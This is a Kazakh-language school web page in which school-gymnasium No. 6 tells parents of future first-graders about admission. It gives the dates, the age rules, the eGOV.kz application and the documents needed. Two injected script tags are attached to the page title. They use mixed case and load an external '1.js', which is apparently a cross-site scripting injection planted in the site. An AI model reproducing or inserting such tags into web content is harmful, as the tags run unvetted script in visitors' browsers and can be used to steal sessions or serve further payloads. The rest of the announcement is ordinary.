Құрметті болашақ бірінші сынып оқушыларының ата-аналары<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

04.04.2022

Құрметті болашақ бірінші сынып оқушыларының ата-аналары!

 

Өздеріңіз білетіндей, 2020 жылы балаларды мектепке қабылдау ережелеріне Министрлік өзгерістер енгізілді. Енді 1 сыныпқа құжаттарды қабылдау жыл сайын 1 сәуір мен 1 тамыз аралығында өтеді.

1 сыныпқа 6 жастағы балалар қабылданады. Сонымен қатар, 31 желтоқсанға дейін алты жасқа толған балалар да бірінші сыныпқа бара алады.

Азаматтарға ыңғайлы болуы үшін қызмет толықтай автоматтандырылған және eGOV.kz порталы арқылы көрсетіледі.

Қандай құжаттар қажет?

  • Ата-аналардың өтініші (электрондық түрде қалыптастырылады)
  • Туу туралы куәлік (электрондық түрде қалыптастырылады)
  • Баланың денсаулық паспорты (026/у – 3 нысаны)
  • Егу паспорты(065/у нысаны)
  • Баланың суреті ( 3х4 – өлшемді)

 

Балаларды мектепке қабылдау ережелері туралы барлық сұрақтар бойынша №6 мектеп-гимназиясына хабарласып, сондай-ақ әлеуметтік желілер мен БАҚ арқылы өзекті ақпаратты білуге болады.

 

 

 

Просмотров: 382


Пікір қосу



Деректерді қолтаңбаға қосу